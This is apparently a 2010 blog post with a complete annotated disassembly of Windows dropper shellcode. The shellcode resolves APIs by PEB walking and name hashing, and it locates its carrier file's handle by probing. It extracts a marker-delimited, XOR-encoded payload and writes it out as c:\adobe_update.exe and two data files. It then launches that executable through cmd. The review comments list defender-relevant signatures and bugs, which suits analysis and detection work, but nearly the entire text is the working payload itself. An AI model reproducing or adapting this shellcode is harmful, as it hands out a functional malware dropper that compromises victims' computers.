bof
posted by 블르샤이닝 2010. 7. 22. 10:26


;-----------------------------------------------------------------------
; Review notes (IDA-style MASM listing, x86-32; callees clean the stack,
; no `add esp` after any call).  No `start proc` line is visible here;
; `start endp` closes the block below.
;
; Self-contained, position-independent stub: no imports, no fixed
; addresses.  edi is set once from the return address of `call $+5` and
; every `[edi+NN]` below is relative to that base.
;
; Layout relative to edi (from the data block and `sub edi, 38h`):
;   edi+0 / edi+4     : the already-executed `push 0Ch / jmp` bytes, reused
;                       as scratch (handle, size) once the stub is past them
;   edi+8 .. edi+37h  : 12 dword slots (slot k at edi+8+4k).  Each starts as
;                       an API-name hash and is overwritten in place (stosd)
;                       with the resolved pointer.  Which API each slot names
;                       is NOT recoverable from this listing alone.
;   edi+38h ..        : ASCII strings (decoded in the data block below)
;   edi+7Ch .. +0AFh  : scratch dwords that lie past the data block, i.e.
;                       inside already-executed code, so the region must be
;                       writable as well as executable.
;
; Defender-relevant static artifacts, all taken verbatim from this listing:
;   - `call $+5` / pop (GetPC), the `fs:30h` PEB walk and the
;     `ror ebx, 0Dh` / `add ebx, edx` name-hash loop;
;   - payload markers 'FVCK' (4B435646h) followed by 19890604h and
;     'KaKa' (614B614Bh) followed by 19811106h, searched in a file read
;     back from an open handle;
;   - the strings "cmd /c c:\adobe_update.exe", "c:\data.EXE" and
;     "c:\data.bIN".
;-----------------------------------------------------------------------
call $+5                                ; push address of the next insn (GetPC)
push 0Ch                                ; 12 = number of hash slots to resolve
jmp short loc_401099
; --- data block; this line is edi+8 after `scasd` and `sub edi, 38h`.
; IDA's dword grouping is shifted by the 3 `db` bytes: the real slots are
; 4-byte aligned from this line.  The top 3 bytes of the last dd on the
; third `dd` line (63h 6Dh 64h) are the "cmd" of the string that follows.
db 4Ch, 22h, 80h
; 12 name hashes (ror-13 accumulate), rewritten with pointers at run time
dd 8AFE987Ch, 0DA08AC0Eh, 0B5B98376h, 7D9BAD78h
dd 0FD97FBDFh, 8A49EA0Fh, 238ADBE8h, 0FA6516E9h
dd 8F17E610h, 0B922F67Bh, 397EC7Ch, 646D630Ch
dd 20632F20h, 615C3A63h, 65626F64h, 6470755Fh    ; " /c c:\adobe_upd"
dd 2E657461h, 657865h, 0                         ; "ate.exe\0" (edi+3Fh -> "c:\...")
dd 5C3A6300h, 61746164h, 4558452Eh, 0            ; "\0c:\data.EXE\0"   (edi+58h)
dd 5C3A6300h, 61746164h, 4E49622Eh, 0            ; "\0c:\data.bIN\0"   (edi+68h)
db 0

; --- locate the first module in the loader's init-order list
loc_401099:
pop ecx                                 ; ecx = 0Ch (slot count)
pop edi                                 ; edi = address of `push 0Ch`
scasd                                   ; edi += 4 -> first hash slot; flags unused
mov eax, fs:30h                         ; PEB (32-bit TEB.ProcessEnvironmentBlock)
mov eax, [eax+0Ch]                      ; PEB.Ldr
mov esi, [eax+1Ch]                      ; Ldr.InInitializationOrderModuleList.Flink
lodsd                                   ; first list entry
mov ebp, [eax+8]                        ; its DllBase; every RVA below is added to ebp
                                        ; NOTE(review): which module sits first in
                                        ; this list is OS-version dependent -- confirm

; --- resolve one slot per iteration: walk the module's export name table,
;     hash each name, stop at the name whose hash equals [edi]
loc_4010AB:
push ecx                                ; remaining slot count
mov esi, [ebp+3Ch]                      ; e_lfanew
mov esi, [esi+ebp+78h]                  ; DataDirectory[EXPORT].VirtualAddress
add esi, ebp                            ; -> IMAGE_EXPORT_DIRECTORY
push esi                                ; kept for the ordinal/function tables
mov esi, [esi+20h]                      ; AddressOfNames (RVA)
add esi, ebp
xor ecx, ecx
dec ecx                                 ; name index = -1, incremented at loop top

loc_4010BE:
inc ecx                                 ; next name index.  No NumberOfNames bound:
                                        ; an unmatched hash walks off the table
lodsd                                   ; RVA of the name string
add eax, ebp                            ; eax -> name
xor ebx, ebx                            ; ebx = running hash

; hash = ror(hash, 13) + byte, over the name up to its NUL
loc_4010C4:
movsx edx, byte ptr [eax]               ; dl = char, dh = its sign byte (00h / 0FFh)
cmp dl, dh                              ; equal at NUL (and at a 0FFh byte)
jz short loc_4010D3
ror ebx, 0Dh
add ebx, edx
inc eax
jmp short loc_4010C4

loc_4010D3:
cmp ebx, [edi]                          ; wanted hash for this slot
jnz short loc_4010BE
pop esi                                 ; esi -> export directory
mov ebx, [esi+24h]                      ; AddressOfNameOrdinals
add ebx, ebp
mov cx, [ebx+ecx*2]                     ; ordinal; the 16-bit write keeps the high
                                        ; half of the index -- fine while index < 10000h
mov ebx, [esi+1Ch]                      ; AddressOfFunctions
add ebx, ebp
mov eax, [ebx+ecx*4]                    ; function RVA
add eax, ebp
stosd                                   ; overwrite the slot with the pointer, edi += 4
pop ecx
loop loc_4010AB                         ; next slot
sub edi, 38h                            ; 12 slots = 30h bytes, so edi = slot0 - 8
xor esi, esi

; --- find an open file: try handle values 1, 2, 3, ... and keep the first
;     whose size query (slot 4) neither fails (-1) nor reports <= 1000h bytes.
;     NOTE(review): the query's identity is inferred only from these two checks.
loc_4010F4:
inc esi                                 ; candidate handle value
lea eax, [edi+80h]                      ; out-parameter
push eax
push esi
call dword ptr [edi+18h]                ; slot 4: (esi, &[edi+80h]) -> eax
cmp eax, 0FFFFFFFFh
jz short loc_4010F4                     ; failure -> next candidate
cmp eax, 1000h
jbe short loc_4010F4                    ; too small to carry the payload -> next
mov [edi+4], eax                        ; size (overwrites spent code bytes)
mov [edi+80h], esi                      ; handle
push dword ptr [edi+4]
push 40h
call dword ptr [edi+34h]                ; slot 11: (40h, size) -> buffer
mov [edi+7Ch], eax                      ; buffer
push 0
push 0
push 0
push dword ptr [edi+80h]
call dword ptr [edi+10h]                ; slot 2: (handle, 0, 0, 0); -1 = failure
cmp eax, 0FFFFFFFFh
jz short loc_40118B                     ; -> release buffer, retry (see flags note)
push 0
lea ebx, [edi+90h]
push ebx                                ; &bytes_done
push dword ptr [edi+4]                  ; size
push dword ptr [edi+7Ch]                ; buffer
push dword ptr [edi+80h]                ; handle
call dword ptr [edi+28h]                ; slot 8: (handle, buffer, size, &[edi+90h], 0)
mov ecx, [edi+90h]
sub ecx, 0Ah                            ; scan budget = bytes done - 10
mov eax, [edi+7Ch]

; --- scan for marker 1: 'FVCK' followed by 19890604h (starts at buffer+1)
loc_401158:
inc eax
cmp dword ptr [eax], 4B435646h          ; 'FVCK'
jnz short loc_40116A
cmp dword ptr [eax+4], 19890604h
jz short loc_40116E

loc_40116A:
loop loc_401158
jmp short loc_40118B                    ; not found -> release, retry

loc_40116E:
add eax, 8                              ; skip the 8-byte marker
mov [edi+94h], eax                      ; payload start

; --- scan on (same ecx budget) for marker 2: 'KaKa' followed by 19811106h
loc_401177:
inc eax
cmp dword ptr [eax], 614B614Bh          ; 'KaKa'
jnz short loc_401189
cmp dword ptr [eax+4], 19811106h
jz short loc_401197

loc_401189:
loop loc_401177                         ; budget exhausted -> falls into release/retry

loc_40118B:
push dword ptr [edi+7Ch]
call dword ptr [edi+30h]                ; slot 10: (buffer) -- presumably a release
jnz loc_4010F4                          ; BUG: branches on whatever flags the callee
                                        ; left behind; with ZF=1 it falls into the
                                        ; "found" path with eax = a stale scan pointer
                                        ; and the buffer already released

; --- markers found: create three files and decode the payload between them
loc_401197:
mov [edi+98h], eax                      ; payload end (address of marker 2)
push 2
lea esi, [edi+3Fh]                      ; "c:\adobe_update.exe"
push esi
call dword ptr [edi+20h]                ; slot 6: (path, 2) -> handle
mov [edi], eax                          ; handle 1 (overwrites spent code bytes)
push 2
lea esi, [edi+58h]                      ; "c:\data.EXE"
push esi
call dword ptr [edi+20h]
mov [edi+9Ch], eax                      ; handle 2
push 2
lea esi, [edi+68h]                      ; "c:\data.bIN"
push esi
call dword ptr [edi+20h]
mov [edi+0A0h], eax                     ; handle 3
mov ebx, [edi+98h]
sub ebx, [edi+94h]                      ; ebx = payload length
mov eax, [edi+94h]

; --- decode in place: byte[i] ^= (len - i) & 0FFh.  The key is the remaining
;     length, so the embedded bytes vary per carrier; the markers above are
;     the stable signature.
;     BUG: do-while with `dec` before the `cmp ebx, 0`: a zero-length payload
;     wraps ebx and the loop runs 2^32 times past the end of the buffer.
loc_4011D8:
xor [eax], bl
dec ebx
inc eax
cmp ebx, 0
jnz short loc_4011D8
; decoded header: three dword lengths, then the three blobs back to back
mov eax, [edi+94h]
mov ecx, [eax]
mov [edi+0A4h], ecx                     ; len 1
add eax, 4
mov ecx, [eax]
mov [edi+0A8h], ecx                     ; len 2
add eax, 4
mov ecx, [eax]
mov [edi+0ACh], ecx                     ; len 3
add eax, 4
mov esi, eax                            ; esi -> blob 1
push dword ptr [edi+0A4h]
push esi
push dword ptr [edi]
call dword ptr [edi+24h]                ; slot 7: (handle 1, blob 1, len 1)
push dword ptr [edi+0A8h]
add esi, [edi+0A4h]                     ; esi -> blob 2
push esi
push dword ptr [edi+9Ch]
call dword ptr [edi+24h]                ; (handle 2, blob 2, len 2)
push dword ptr [edi+0ACh]
add esi, [edi+0A8h]                     ; esi -> blob 3
push esi
push dword ptr [edi+0A0h]
call dword ptr [edi+24h]                ; (handle 3, blob 3, len 3)
push dword ptr [edi]
call dword ptr [edi+1Ch]                ; slot 5: (handle 1)
push dword ptr [edi+9Ch]
call dword ptr [edi+1Ch]                ; (handle 2)
push dword ptr [edi+0A0h]
call dword ptr [edi+1Ch]                ; (handle 3)
call dword ptr [edi+8]                  ; slot 0: no args; result is used as a C string
push eax                                ; saved for the append below
lea esi, [edi+3Fh]                      ; "c:\adobe_update.exe"
mov edx, esi

; --- strlen-style walk: edx -> byte after the NUL
loc_401262:
mov al, [edx]
inc edx
or al, al
jz short loc_40126B
jmp short loc_401262

loc_40126B:
mov byte ptr [edx-1], 20h               ; replace the NUL with a space
pop ecx                                 ; ecx -> string returned by slot 0

; --- strcat: append that string after the space
loc_401270:
mov al, [ecx]
or al, al
jz short loc_40127C
mov [edx], al
inc edx
inc ecx
jmp short loc_401270

loc_40127C:
mov [edx], al                           ; terminating NUL
sub esi, 7                              ; back to "cmd /c " -> "cmd /c c:\adobe_update.exe <str>"
call $+5                                ; push address of the `add` below
add [esp+4+var_4], 0Dh                  ; IDA stack-var notation; with var_4 = -4 this
                                        ; is [esp] += 0Dh, which should move the
                                        ; pushed address to the bytes right after
                                        ; the `jmp` (the db/dd tail below)
push 0
push esi                                ; command line
push dword ptr [edi+2Ch]                ; value stored in slot 9 passed as first argument
jmp dword ptr [edi+0Ch]                 ; tail-call slot 1 with the faked return address
start endp

; Continuation reached through the return address built above; IDA left it
; as data.  Decodes as: push 0 / push 0FFFFFFFFh / call dword ptr [edi+14h]
; (slot 3, the only slot not called above) / 6 x nop, then 0B58h zero bytes.
db 6Ah
dd 0FFFF6A00h, 90901457h, 90909090h, 0B58h dup(0)
_text ends

